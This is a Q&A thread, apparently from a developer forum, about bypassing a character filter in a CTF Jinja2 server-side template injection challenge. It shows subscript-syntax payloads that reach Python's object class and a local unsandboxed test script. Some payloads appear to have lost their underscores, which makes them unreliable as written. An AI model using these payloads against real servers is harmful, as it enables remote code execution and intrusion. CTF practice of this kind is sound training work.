
I'm doing a Capture The Flag (CTF) and I'm trying to exploit a server vulnerable to Jinja2 Server Side Template Injection (SSTI).
I can't use the following characters: \, |, ,, . and _. I'm trying to write the following command:

{{''.class.mro()[1].subclasses()}}

Any ideas?

I tried using the attr method, but I can't use it because of the limitation of using | and ..

β.εηοιτ.βε
faint

1 Answer


Most of what you need here is probably explained in the "Variables" chapter and further explained in the "Implementation" note:

You can use a dot (.) to access attributes of a variable in addition to the standard Python __getitem__ “subscript” syntax ([]).

The following lines do the same thing:

{{ foo.bar }}
{{ foo['bar'] }}

Source: https://jinja.palletsprojects.com/en/3.1.x/templates/#variables

Then, later:

foo['bar'] works mostly the same with a small difference in sequence:

  • check for an item 'bar' in foo. (foo.__getitem__('bar'))
  • if there is not, check for an attribute called bar on foo. (getattr(foo, 'bar'))
  • if there is not, return an undefined object.

Source: https://jinja.palletsprojects.com/en/3.1.x/templates/#notes-on-subscriptions

So, if I try this kind of thing on a Jinja environment:

{{ ''['__class__']['mro']()[1] }}

I do indeed get <class 'object'> in return.

Here, I was not able to achieve ''['class'], but on the other hand I can achieve it using dict['class']:

{{ dict['class']['mro']()[1] }}

As for the call to the .subclasses() method, it is unclear if this comes from your example implementation or from somewhere else.

Testing environment:

├── jinja.py
└── templates
    └── template.html.j2

jinja.py:

from jinja2 import Environment, FileSystemLoader

# A plain Environment, not SandboxedEnvironment: attribute and item lookups are unrestricted
environment = Environment(loader=FileSystemLoader('templates/'))
template = environment.get_template('template.html.j2')
# The template takes no variables; everything it reaches starts from literals and globals
print(template.render())

templates/template.html.j2:

{{ dict['class']['mro']()[1] }}

Output:

<class 'object'>
β.εηοιτ.βε